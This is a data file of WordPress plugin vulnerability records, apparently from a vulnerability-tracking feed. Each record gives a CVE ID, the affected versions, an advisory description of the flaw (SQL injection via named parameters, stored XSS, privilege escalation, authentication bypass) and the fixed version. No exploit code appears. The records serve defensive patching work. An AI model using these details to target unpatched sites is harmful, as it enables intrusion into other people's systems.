{"CVE_ID":"CVE-2025-2317","slug":"woo-product-filter","versionImpact":"2.7.9","versionEndExcluding":"2.8.0","description":"The Product Filter by WBW plugin for WordPress is vulnerable to time-based SQL Injection via the filtersDataBackend parameter in all versions up to, and including, 2.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-filter\\\/tags\\\/2.7.8\\\/modules\\\/meta\\\/models\\\/meta_values.php#L163\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-filter\\\/tags\\\/2.7.8\\\/modules\\\/meta\\\/models\\\/meta_values.php#L163\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-filter\\\/tags\\\/2.7.8\\\/modules\\\/meta\\\/models\\\/meta_values.php#L174\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-filter\\\/tags\\\/2.7.8\\\/modules\\\/meta\\\/models\\\/meta_values.php#L174\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/329aae11-a141-4c61-8198-1cd8e4e6bfea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/329aae11-a141-4c61-8198-1cd8e4e6bfea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10581","slug":"directorypress-frontend","versionImpact":"2.7.9","versionEndExcluding":"2.8.0","description":"The DirectoryPress Frontend plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.9. This is due to missing or incorrect nonce validation on the dpfl_listingStatusChange() function. This makes it possible for unauthenticated attackers to update listing statuses via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3239657%40directorypress-frontend&new=3239657%40directorypress-frontend&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3239657%40directorypress-frontend&new=3239657%40directorypress-frontend&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36986585-7aaa-4c49-b426-fb9078fbb9ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36986585-7aaa-4c49-b426-fb9078fbb9ae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4127","slug":"wp-seo-structured-data-schema","versionImpact":"2.7.11","versionEndExcluding":"2.8.0","description":"The WP SEO Structured Data Schema plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018Price Range\u2019 parameter in all versions up to, and including, 2.7.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts that will execute whenever an administrator accesses the plugin settings page.","recommendation":"Update to version 2.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-seo-structured-data-schema\\\/trunk\\\/lib\\\/classes\\\/KcSeoHelper.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-seo-structured-data-schema\\\/trunk\\\/lib\\\/classes\\\/KcSeoHelper.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3289009\\\/wp-seo-structured-data-schema\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3289009\\\/wp-seo-structured-data-schema\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24f6c4e4-11c3-476f-9f50-42053b625ab8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24f6c4e4-11c3-476f-9f50-42053b625ab8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1430","slug":"fluent-crm","versionEndExcluding":"2.8.0","description":"The FluentCRM - Marketing Automation For WordPress  plugin for WordPress is vulnerable to unauthorized modification of data in versions up to, and including, 2.7.40 due to the use of an MD5 hash without a salt to control subscriptions. This makes it possible for unauthenticated attackers to unsubscribe users from lists and manage subscriptions, granted they gain access to any targeted subscribers email address.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2899218\\\/fluent-crm\\\/tags\\\/2.8.0\\\/app\\\/Hooks\\\/Handlers\\\/ExternalPages.php?old=2873074&old_path=fluent-crm%2Ftags%2F2.7.40%2Fapp%2FHooks%2FHandlers%2FExternalPages.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2899218\\\/fluent-crm\\\/tags\\\/2.8.0\\\/app\\\/Hooks\\\/Handlers\\\/ExternalPages.php?old=2873074&old_path=fluent-crm%2Ftags%2F2.7.40%2Fapp%2FHooks%2FHandlers%2FExternalPages.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de6da87e-8f7d-4120-8a1b-390ef7733d84?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de6da87e-8f7d-4120-8a1b-390ef7733d84?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10786","slug":"simple-local-avatars","versionImpact":"2.7.11","versionEndExcluding":"2.8.0","description":"The Simple Local Avatars plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the sla_clear_user_cache function in all versions up to, and including, 2.7.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to clear user caches.","recommendation":"Update to version 2.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2619d50-e295-4e13-91d4-f998b8aa5be4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2619d50-e295-4e13-91d4-f998b8aa5be4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-local-avatars\\\/tags\\\/2.7.11\\\/includes\\\/class-simple-local-avatars.php#L1374\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-local-avatars\\\/tags\\\/2.7.11\\\/includes\\\/class-simple-local-avatars.php#L1374\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186674\\\/simple-local-avatars\\\/tags\\\/2.8.0\\\/includes\\\/class-simple-local-avatars.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186674\\\/simple-local-avatars\\\/tags\\\/2.8.0\\\/includes\\\/class-simple-local-avatars.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1295","slug":"templines-helper-core","versionImpact":"2.7","versionEndExcluding":"2.8","description":"The Templines Elementor Helper Core plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.7. This is due to allowing arbitrary user meta updates. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update their role to Administrator. The vulnerability can only be exploited when the BuddyPress plugin is also installed and activated.","recommendation":"Update to version 2.8, or a newer patched version","refs":"[{\"url\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/templines-helper-core\\\/youzify\\\/youzify.php#L3082\",\"name\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/templines-helper-core\\\/youzify\\\/youzify.php#L3082\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c5aa062-b9a2-4ddb-a5bf-4c8368218e85?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c5aa062-b9a2-4ddb-a5bf-4c8368218e85?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5099","slug":"hk-filter-and-search","versionImpact":"2.7","versionEndExcluding":"2.8","description":"The HTML filter and csv-file search plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 2.7 via the 'src' attribute of the 'csvsearch' shortcode. This allows authenticated attackers, with contributor-level permissions and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985200\\\/hk-filter-and-search\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985200\\\/hk-filter-and-search\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee2b4055-8cbd-49b7-bb0b-eddef85060fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee2b4055-8cbd-49b7-bb0b-eddef85060fc?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7891","slug":"floating-contact","versionImpact":"2.7","versionEndExcluding":"2.8","description":"The Floating Contact Button WordPress plugin before 2.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b584a225-0d91-464d-b1c1-15594274d9d4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b584a225-0d91-464d-b1c1-15594274d9d4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5096","slug":"hk-filter-and-search","versionImpact":"2.7","versionEndExcluding":"2.8","description":"The HTML filter and csv-file search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'csvsearch' shortcode in versions up to, and including, 2.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/157eddd4-67f0-4a07-b3ab-11dbfb9f12aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/157eddd4-67f0-4a07-b3ab-11dbfb9f12aa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985200\\\/hk-filter-and-search\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985200\\\/hk-filter-and-search\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4791","slug":"woo-product-slider-and-carousel-with-category","versionEndExcluding":"2.8","description":"The Product Slider and Carousel with Category for WooCommerce WordPress plugin before 2.8 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0a6e4c45-3f6d-4150-9546-141c2e3a1782\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0a6e4c45-3f6d-4150-9546-141c2e3a1782\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6250","slug":"facebook-button-plugin","versionImpact":"2.73","versionEndExcluding":"2.74","description":"The BestWebSoft's Like & Share WordPress plugin before 2.74 discloses the content of password protected posts to unauthenticated users via a meta tag","recommendation":"Update to version 2.74, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6cad602b-7414-4867-8ae2-f0b846c4c8f0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6cad602b-7414-4867-8ae2-f0b846c4c8f0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0067","slug":"timed-content","versionEndExcluding":"2.73","description":"The Timed Content WordPress plugin before 2.73 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/92f43da9-9903-4bcf-99e8-0e269072d389\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/92f43da9-9903-4bcf-99e8-0e269072d389\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7498","slug":"exclusive-addons-for-elementor","versionImpact":"2.7.9.4","versionEndExcluding":"2.7.9.5","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown Widget in all versions up to, and including, 2.7.9.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/exad-scripts.js#L187\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/exad-scripts.js#L187\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/trunk\\\/assets\\\/vendor\\\/js\\\/jquery.countdown.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/trunk\\\/assets\\\/vendor\\\/js\\\/jquery.countdown.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3326867%40exclusive-addons-for-elementor&new=3326867%40exclusive-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3326867%40exclusive-addons-for-elementor&new=3326867%40exclusive-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51d3d738-5c82-4f6b-b8f3-d5af5391b6f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51d3d738-5c82-4f6b-b8f3-d5af5391b6f6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1425","slug":"groundhogg","versionEndExcluding":"2.7.9.4","description":"The WordPress CRM, Email & Marketing Automation for WordPress | Award Winner \u2014 Groundhogg WordPress plugin before 2.7.9.4 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admins","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/578f4179-e7be-4963-9379-5e694911b451\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/578f4179-e7be-4963-9379-5e694911b451\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4783","slug":"exclusive-addons-for-elementor","versionImpact":"2.7.9.1","versionEndExcluding":"2.7.9.2","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the HTML attributes of the Countdown Timer Widget in all versions up to, and including, 2.7.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/tags\\\/2.7.9.1\\\/assets\\\/js\\\/elements-js\\\/countdown-timer.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/tags\\\/2.7.9.1\\\/assets\\\/js\\\/elements-js\\\/countdown-timer.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec41956f-eefc-4c8b-ade1-2a3a0f3d86df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec41956f-eefc-4c8b-ade1-2a3a0f3d86df?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2017","slug":"countdown-builder","versionImpact":"2.7.8","versionEndExcluding":"2.7.8.1","description":"The Countdown, Coming Soon, Maintenance \u2013 Countdown & Clock plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the conditionsRow and switchCountdown functions in all versions up to, and including, 2.7.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject PHP Objects and modify the status of countdowns.","recommendation":"Update to version 2.7.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8fab229-cd6b-45a3-9e80-a03a1704ad3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8fab229-cd6b-45a3-9e80-a03a1704ad3e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/countdown-builder\\\/trunk\\\/classes\\\/Ajax.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/countdown-builder\\\/trunk\\\/classes\\\/Ajax.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/countdown-builder\\\/trunk\\\/classes\\\/Ajax.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/countdown-builder\\\/trunk\\\/classes\\\/Ajax.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097588\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097588\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096150\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096150\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10114","slug":"woo-social-login","versionImpact":"2.7.7","versionEndExcluding":"2.7.8","description":"The WooCommerce - Social Login plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.7.7. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.","recommendation":"Update to version 2.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71df23bf-8f51-4260-be1f-ed5bc29d4afe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71df23bf-8f51-4260-be1f-ed5bc29d4afe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpwebelite.com\\\/changelogs\\\/woocommerce-social-login\\\/changelog.txt\",\"name\":\"https:\\\/\\\/www.wpwebelite.com\\\/changelogs\\\/woocommerce-social-login\\\/changelog.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3453","slug":"password-protected","versionImpact":"2.7.7","versionEndExcluding":"2.7.8","description":"The Password Protected \u2013 Password Protect your WordPress Site, Pages, & WooCommerce Products \u2013 Restrict Content, Protect WooCommerce Category and more plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.7.7 via the 'password_protected_cookie' function. This makes it possible for unauthenticated attackers to extract sensitive data including all protected site content if the 'Use Transient' setting is enabled.","recommendation":"Update to version 2.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/password-protected\\\/trunk\\\/includes\\\/compatibility.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/password-protected\\\/trunk\\\/includes\\\/compatibility.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274358\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274358\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/241d75ca-55e3-461a-9844-52e69904da1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/241d75ca-55e3-461a-9844-52e69904da1b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10104","slug":"job-postings","versionImpact":"2.7.7","versionEndExcluding":"2.7.8","description":"The Jobs for WordPress plugin before 2.7.8 does not sanitise and escape some of its Job settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 2.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0a9c8ae-f2cf-4322-8216-4778b0e37a48\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0a9c8ae-f2cf-4322-8216-4778b0e37a48\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10143","slug":"mb-custom-post-type","versionImpact":"2.7.6","versionEndExcluding":"2.7.7","description":"The MB Custom Post Types & Custom Taxonomies WordPress plugin before 2.7.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b5fd7a3e-33e4-4c73-a581-881f063855b0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b5fd7a3e-33e4-4c73-a581-881f063855b0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10400","slug":"tutor","versionImpact":"2.7.6","versionEndExcluding":"2.7.7","description":"The Tutor LMS plugin for WordPress is vulnerable to SQL Injection via the \u2018rating_filter\u2019 parameter in all versions up to, and including, 2.7.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186319\\\/tutor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186319\\\/tutor\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcf37d4e-e94a-4046-9949-c208e4e70197?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcf37d4e-e94a-4046-9949-c208e4e70197?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10393","slug":"tutor","versionImpact":"2.7.6","versionEndExcluding":"2.7.7","description":"The Tutor LMS plugin for WordPress is vulnerable to user registration bypass in versions up to, and including, 2.7.6. This is due to a missing check for the 'users_can_register' option in the 'register_instructor' function. This makes it possible for unauthenticated attackers to register as the default role on the site, even if registration is disabled.","recommendation":"Update to version 2.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186319\\\/tutor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186319\\\/tutor\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf8aa169-df51-46db-8c65-f1543d4f75f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf8aa169-df51-46db-8c65-f1543d4f75f9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11767","slug":"newsmanapp","versionImpact":"2.7.6","versionEndExcluding":"2.7.7","description":"The NewsmanApp plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'newsman_subscribe_widget' shortcode in all versions up to, and including, 2.7.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsmanapp\\\/trunk\\\/newsmanapp.php#L1054\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsmanapp\\\/trunk\\\/newsmanapp.php#L1054\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsmanapp\\\/trunk\\\/newsmanapp.php#L1075\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsmanapp\\\/trunk\\\/newsmanapp.php#L1075\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205721\\\/newsmanapp\\\/trunk\\\/newsmanapp.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205721\\\/newsmanapp\\\/trunk\\\/newsmanapp.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22a02e75-4ab1-48fb-b618-b1dff2fcd97f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22a02e75-4ab1-48fb-b618-b1dff2fcd97f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12597","slug":"ht-mega-for-elementor","versionImpact":"2.7.6","versionEndExcluding":"2.7.7","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'block_css' and 'inner_css' parameters in all versions up to, and including, 2.7.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209697\\\/ht-mega-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209697\\\/ht-mega-for-elementor\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17f12e75-0bb6-48ed-9ba2-17caab268d61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17f12e75-0bb6-48ed-9ba2-17caab268d61?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
